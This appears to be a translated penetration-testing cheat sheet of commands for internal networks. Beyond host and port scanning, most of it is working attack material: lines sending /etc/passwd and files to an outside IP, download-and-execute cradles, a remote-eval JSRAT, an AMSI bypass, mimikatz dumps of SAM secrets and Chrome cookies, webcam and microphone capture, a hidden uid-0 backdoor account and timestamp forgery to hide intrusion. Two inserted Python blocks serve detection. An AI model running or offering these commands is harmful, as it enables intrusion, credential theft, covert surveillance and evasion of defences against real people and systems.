A collection of commonly used commands for internal network penetration testing, kept here as a memo and quick reference.

One command to geolocate the source addresses of SSH logins

for i in $(grep 'sshd' /var/log/auth.log* | grep 'Accepted' | grep ftp | grep -oE '\<([1-9]|[1-9][0-9]|1[0-9]{2}|2[01][0-9]|22[0-3])\>(\.\<([0-9]|[0-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\>){2}\.\<([1-9]|[0-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-4])\>' | sort | uniq); do curl -s --header "X-Forwarded-For: $i" http://1212.ip138.com/ic.asp | iconv -c -f GB2312 -t utf-8 | grep -o -P '(?<=<center>您的IP是:).*(?=<\/center)'; done
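As an added defensive example (not part of the original page), the same sshd "Accepted" lines can be parsed into user, method and source address and counted per address before any geolocation lookup; the auth.log lines below are constructed sample data:

```python
import re
from collections import Counter

# Matches the "Accepted" line sshd writes to auth.log on every successful login
ACCEPTED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted (?P<method>\S+) for (?P<user>\S+) from "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port (?P<port>\d+)"
)

def parse_accepted_logins(log_text):
    """Return one dict (ts, method, user, ip, port) per successful sshd login."""
    logins = []
    for line in log_text.splitlines():
        m = ACCEPTED_RE.search(line)
        if m:
            logins.append(m.groupdict())
    return logins

def source_ip_counts(log_text, user=None):
    """Count successful logins per source IP, optionally restricted to one user."""
    counts = Counter()
    for entry in parse_accepted_logins(log_text):
        if user is None or entry["user"] == user:
            counts[entry["ip"]] += 1
    return dict(counts)

# Constructed sample auth.log content (not taken from a real host)
SAMPLE_LOG = """\
Mar  3 10:15:01 host1 sshd[1201]: Accepted password for ftp from 203.0.113.10 port 51022 ssh2
Mar  3 10:15:40 host1 sshd[1210]: Failed password for root from 198.51.100.7 port 40011 ssh2
Mar  3 10:16:05 host1 sshd[1215]: Accepted publickey for admin from 192.0.2.5 port 52000 ssh2
Mar  3 10:17:30 host1 sshd[1222]: Accepted password for ftp from 203.0.113.10 port 51030 ssh2
Mar  3 10:18:02 host1 sshd[1230]: pam_unix(sshd:session): session opened for user admin
"""

if __name__ == "__main__":
    # Failed logins and session lines are ignored; only accepted logins are counted
    for ip, n in sorted(source_ip_counts(SAMPLE_LOG).items()):
        print(ip, n)
```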

This command retrieves every registry value whose name contains a password

REG query HKCU /v "pwd" /s
(pwd can be replaced with password; HKCU can be replaced with HKCR)

PowerUp.ps1 performs privilege escalation checks: the script looks on the host for exploitable weaknesses in services, DLLs, third-party software and so on

powershell  IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks

Live host scanning script

Usage: ./xxx.sh 192.168.10 > IP

#!/bin/bash
# Ping a single address once; print it if the host answered
is_alive_ping()
{
  ping -c 1 $1 > /dev/null
  [ $? -eq 0 ] && echo $1
}
read -p "IP[1.2.3]" IP
# Probe the whole /24 in the background so the sweep finishes quickly
for i in $IP.{1..254}
do
is_alive_ping $i & disown
done

Finding live hosts in an internal C-class range

for /l %i in (1,1,255) do @ping 10.0.1.%i -w 1 -n 1 | find /i "ttl"

Finding host names

for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Pinging"

B-class range search: an internal network does not always contain just one domain, and when two domains have no trust relationship this command can still sweep them out

for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Pinging"

Mapping domain machines to IPs

FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.)

Port scanning script

Usage: run the Python program directly, e.g. save it as test.py and run python test.py. The prerequisite is that the IP file exists, i.e. the IP list generated by the shell script in the first step.

import threading, os, time

def ncDetect(IP):
    # Run nc in zero-I/O scan mode (-z) over the port range and keep only the "succeeded" lines
    command = "nc -v -z " + IP + " 21-9000 2>&1 | grep succeed"
    os.system(command)

# The IP file is the host list produced by the discovery script above, one address per line
IPHandle = open("IP", "r")
test = IPHandle.readline().strip('\n')
while test:
    # Scan up to five hosts concurrently, then pause before starting the next batch
    for i in range(5):
        t = threading.Thread(target=ncDetect, args=(test,))
        t.start()
        test = IPHandle.readline().strip('\n')
        if not test:
            break
    time.sleep(5)
IPHandle.close()
exit(0)

ICMP scanning

Various ICMP-based methods for discovering internal hosts. If the firewall filters ICMP requests this approach is basically useless, but in practice ICMP is rarely filtered. Besides the built-in commands, third-party programs such as cping can also be used.

ICMP scanning on Windows

  • Run the following command in cmd to ping-sweep the whole C-class range

    for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl"
    
  • B-class range search

    for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Pinging"
    

Also, findstr /i "pinging" or findstr /i "ping" can be replaced with findstr "[", which works in multilingual environments

  • Use PowerShell to ICMP-scan the target internal network

    powershell.exe -exec bypass -Command "Import-Module C:\Invoke-TSPingSweep.ps1;Invoke-TSPingSweep -StartAddress 192.168.3.1 -EndAddress 192.168.3.254 -ResolveHost -ScanPort -Port 21,22,23,25,53,80,81,82,83,84,85,86,87,88,89,110,111,143,389,443,445,873,1025,1433,1521,2601,3306,3389,3690,5432,5900,7001,8000,8080,8081,8082,8083,8084,8085,8086,8087,8089,9090,10000"

    The target range is not limited to a C-class network; for example, it can also be written as `192.168.3.1 - 192.168.31.254`
    

ICMP scanning on Linux

  • The simplest way: save the following code as a shell script, make it executable and run it

    #!/bin/bash
    for ip in 192.168.1.{1..254}
    do
    	ping $ip -c 1 &> /dev/null
    		if [ $? -eq 0 ];then
    			echo $ip is alive ....
    		fi
    done
    
  • nmap ICMP scan

    nmap -sn -PE 192.168.1.0/24
    

ARP scanning

ARP scanning on Windows

start /b arpscan.exe -t 192.168.1.0/24 >> result.txt

powershell.exe -exec bypass -Command "Import-Module C:\Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.1.0/24"  >> result.txt

ARP scanning on Linux

# wget https://nmap.org/dist/nmap-7.40.tar.bz2
# bzip2 -cd nmap-7.40.tar.bz2 | tar xvf -
# cd nmap-7.40
# ./configure        # --prefix can be used here to specify the install path
# echo $?
# make
# make install
# echo $?
# make install
# echo $?
# nmap -sn -PR 192.168.1.0/24    # try an ARP scan
  • Inside someone else's VPN internal network (Kali)

    netdiscover -r 192.168.1.0/24 -i eth0

    msf ARP scan module

    msf > use  auxiliary/scanner/discovery/arp_sweep
    msf > show options
    msf > set  interface eth0
    msf > set  smac 00:0c:29:92:fd:85
    msf > set  rhosts 192.168.1.0/24
    msf > set  threads 20
    msf > set  shost 192.168.1.27
    msf > run
    
  • meterpreter

    meterpreter > getsystem
    (Also, when scanning from the target machine, escalate privileges first (personal recommendation, it makes things much easier); otherwise the scan may run into problems)
    meterpreter > run autoroute -s 192.168.1.0/24
    meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24
    

Internal host discovery based on SMB and NetBIOS

On Windows:

nbtscan.exe -m 192.168.1.0/24
(a very classic little tool)

On Linux:

wget http://www.unixwiz.net/tools/nbtscan-source-1.0.35.tgz
tar -zxvf nbtscan-source-1.0.35.tgz
make
echo $?
./nbtscan -h
./nbtscan -m 192.168.1.0/24

Scanning inside a domain

net view
dsquery computer
(in practice, the most useful tool inside a domain is still nbtscan)

PS: when there are many computer names, a batch file can ping them in bulk to obtain the IPs

@echo off
setlocal ENABLEDELAYEDEXPANSION
@FOR /F "usebackq eol=- skip=1 delims=\" %%j IN (`net view ^| find "命令成功完成" /v ^|find "The command completed successfully." /v`) DO (
@FOR /F "usebackq delims=" %%i IN (`@ping -n 1 -4 %%j ^| findstr "Pinging"`) DO (
@FOR /F "usebackq tokens=2 delims=[]" %%k IN (`echo %%i`) DO (echo %%k  %%j)
)
)

Summary of one-liners for starting an HTTP server in various scripting languages and versions

Python 2.x

python -m SimpleHTTPServer 8000

Python 3.x

python -m http.server 8000

Twisted (Python)

twistd -n web -p 8000 --path .

Or:

python -c 'from twisted.web.server import Site; from twisted.web.static import File; from twisted.internet import reactor; reactor.listenTCP(8000, Site(File("."))); reactor.run()'

Ruby

ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd).start'

Ruby 1.9.2+

ruby -run -ehttpd . -p8000

adsf (Ruby)

gem install adsf # install dependency
adsf -p 8000

Sinatra (Ruby)

gem install sinatra # install dependency
ruby -rsinatra -e'set :public_folder, "."; set :port, 8000'

Perl

 cpan HTTP::Server::Brick # install dependency
 perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>8000); $s->mount("/"=>{path=>"."}); $s->start'

Plack (Perl)

 cpan Plack # install dependency
 plackup -MPlack::App::Directory -e 'Plack::App::Directory->new(root=>".");' -p 8000

Mojolicious (Perl)

 cpan Mojolicious::Lite # install dependency
 perl -MMojolicious::Lite -MCwd -e 'app->static->paths->[0]=getcwd; app->start' daemon -l http://*:8000

http-server (Node.js)

 npm install -g http-server # install dependency
 http-server -p 8000

node-static (Node.js)

 npm install -g node-static # install dependency
 static -p 8000

PHP (>= 5.4)

 php -S 127.0.0.1:8000

Erlang

erl -s inets -eval 'inets:start(httpd,[{server_name,"NAME"},{document_root, "."},{server_root, "."},{port, 8000},{mime_types,[{"html","text/html"},{"htm","text/html"},{"js","text/javascript"},{"css","text/css"},{"gif","image/gif"},{"jpg","image/jpeg"},{"jpeg","image/jpeg"},{"png","image/png"}]}]).'

busybox httpd

busybox httpd -f -p 8000

webfs

webfsd -F -p 8000

IIS Express

C:\> "C:\Program Files (x86)\IIS Express\iisexpress.exe" /path:C:\MyWeb /port:8000

Whois

Receiving end:

nc -vlnp 8000 | sed "s/ //g" | base64 -d

Sending end:

whois -h 47.107.82.71 -p 8000 `cat /etc/passwd | base64`

NC

Receiving end:

nc -lvvp 8000 > test.txt

cat < /dev/tcp/10.10.10.200/8000 > 1.txt

Sending end:

cat test.txt | nc  47.107.82.71 8000

nc 47.107.82.71 8000 < 10000.txt

SMB

impacket tool download

The tool is already integrated in Kali

 # Start an SMB server in the current directory with share name "share"
 impacket-smbserver share `pwd`

Download a file:

copy \\IP\ShareName\File.exe file.exe

Upload a file:

net use x: \\IP\ShareName
copy file.txt x:
net use x: /delete

Bash

Receiving end

nc -lvnp 8000 > test.txt

Sending end

cat test.txt > /dev/tcp/ip/port

Linux

After getting a reverse shell on Linux, to make it conveniently interactive:

python -c 'import pty; pty.spawn("/bin/bash")'

When python is not available:

expect -c 'spawn bash;interact'

Downloading a file when wget, nc and other download tools are not available

exec 5<>/dev/tcp/sec-lab.org/80 && echo -e "GET /c.pl HTTP/1.0\n" >&5 && cat <&5 > c.pl

Change the timestamp of an uploaded file (to cover intrusion traces)

touch -r <old file> <new file>

Privilege escalation via Bash

This requires the administrator to have the habit of using su; through it we can add a user with id=0. PROMPT_COMMAND holds the command that is executed before the primary prompt PS1 is displayed. Export:

export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 hack &>/dev/null && echo hacker:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"
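As an added defensive check (not part of the original page), the two artefacts this trick leaves behind, an extra uid-0 account in /etc/passwd and a PROMPT_COMMAND value that creates or modifies accounts, can be looked for; the passwd content below is constructed, and the set of names allowed to have uid 0 is an assumption:

```python
import re

# Assumption: root is the only account that may legitimately carry uid 0
ALLOWED_UID0 = {"root"}

def find_extra_uid0_accounts(passwd_text):
    """Return names of /etc/passwd entries that have uid 0 but are not in ALLOWED_UID0."""
    extra = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            continue  # malformed entry, skip rather than guess
        name, uid = fields[0], fields[2]
        if uid == "0" and name not in ALLOWED_UID0:
            extra.append(name)
    return extra

# Account-management commands that have no business inside a prompt hook
SUSPICIOUS_PROMPT_RE = re.compile(r"\b(useradd|usermod|chpasswd|passwd)\b")

def prompt_command_is_suspicious(value):
    """Flag a PROMPT_COMMAND value that creates or modifies accounts."""
    return bool(value) and SUSPICIOUS_PROMPT_RE.search(value) is not None

# Constructed sample /etc/passwd content (not taken from a real host)
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
hack:x:0:0::/home/hack:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""

if __name__ == "__main__":
    import os
    print("extra uid-0 accounts:", find_extra_uid0_accounts(SAMPLE_PASSWD))
    # On a live host, check the current shell's own hook as well
    print("PROMPT_COMMAND suspicious:",
          prompt_command_is_suspicious(os.environ.get("PROMPT_COMMAND", "")))
```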

lsof command

lsof 1.txt           show the processes that have the file 1.txt open
lsof -i :22          find out which program is currently using port 22
lsof -c nsd          show the files currently opened by the nsd process
lsof -g gid          show the processes belonging to gid
lsof +d /usr/local/  show files under the directory that processes have open
lsof +D /usr/local/  same as above, but also recurses into subdirectories; takes longer
lsof -d 4            show processes using fd 4
lsof -i              show processes matching the given network conditions

SSH port forwarding

The following article describes the 3 forwarding modes in detail: https://www.cnblogs.com/david-zhang-index/archive/2012/08/18/2645943.html

plink usage

plink.exe root@10.10.10.100 -batch -pw 123456 -c "uname -a"
E:\>plink.exe root@10.10.10.100 -batch -pw 123456 -c "uname -a"
Linux CentOS6 2.6.32-642.el6.i686 #1 SMP Tue May 10 16:13:51 UTC 2016 i686 i686 i386 GNU/Linux

Image webshell

Exiftool "-comment<=raj.php" 1.png

Windows

Powershell

Get wireless passwords:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Get-WLAN-Keys.ps1');Get-Wlan-Keys "

Privilege escalation and adding an account

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"

Download and execute:

powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://b.hiphotos.baidu.com/image/pic/item/d009b3de9c82d15825ffd75c840a19d8bd3e42da.jpg','C:\Users\Public\test.jpg') & start C:\Users\Public\test.jpg

Webcam recording:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/xorrior/RandomPS-Scripts/master/MiniEye.ps1'); Capture-MiniEye -RecordTime 2 -Path $env:temp\hack.avi"

Audio recording:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-MicrophoneAudio.ps1');Get-MicrophoneAudio -Path $env:TEMP\secret.wav -Length 10 -Alias 'SECRET'"

MSHTA

VBSCRIPT EXEC

mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)

JAVASCRIPT EXEC

mshta javascript:"..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

JSRAT

mshta javascript:"..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

Bypass AMSI

PS C:\> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue(null,true)

use:

powershell.exe -ExecutionPolicy Bypass -noprofile [Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'').GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue(null,true);iex(New-Object Net.WebClient).DownloadString(''http://192.168.230.1/msfpayload.ps1'')

Bypass AV

sqlite3.exe -cmd "select load_extension('1.txt','EP')"
sqlite3.exe -cmd "select load_extension('\\192.168.1.101\share\1.txt','EP')"

mimikatz

Get VPN passwords:

mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

Read Chrome cookies

mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\USERDA~1" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit 

Command-line download

certutil

certutil -urlcache -split -f example.com/file

certutil -urlcache -split -f http://ip:8000/10000.txt d:\1234.txt&&d:\1234.txt

Today I happened to pull off something big with this command; veterans will get it at a glance. I found the usage on Baidu; hope it is useful to everyone

echo 48 65 6C 6C 6F 2C 57 6F 72 6C 64 21 >hex.txt

This generates hex.txt; the bytes correspond to the text "Hello,World!"

certutil -decodehex hex.txt bin.txt      (Hex2Bin)

certutil -encode bin.txt Encode.txt      (Base64_Encode)

certutil -decode Encode.txt Decode.txt   (Base64_Decode)

powershell

powershell (new-object System.Net.WebClient).DownloadFile('http://ip/5.exe','c:\download\a.exe');start-process 'c:\download\a.exe'

bitsadmin

 bitsadmin /transfer n http://ip:8000/10000.txt d:\12345.txt && d:\12345.txt

regsvr32

regsvr32 /u /s /i:http://ip/5.exe scrobj.dll

curl

curl http://ip:8000/10000.txt

wget

wget http://ip:8000/10000.txt -O 1.txt

awk

awk 'BEGIN {
  RS = ORS = "\r\n"
  HTTPCon = "/inet/tcp/0/127.0.0.1/8000"
  print "GET /10000.txt HTTP/1.1\r\nConnection: close\r\n"    |& HTTPCon
  while (HTTPCon |& getline > 0)
      print $0
  close(HTTPCon)
}'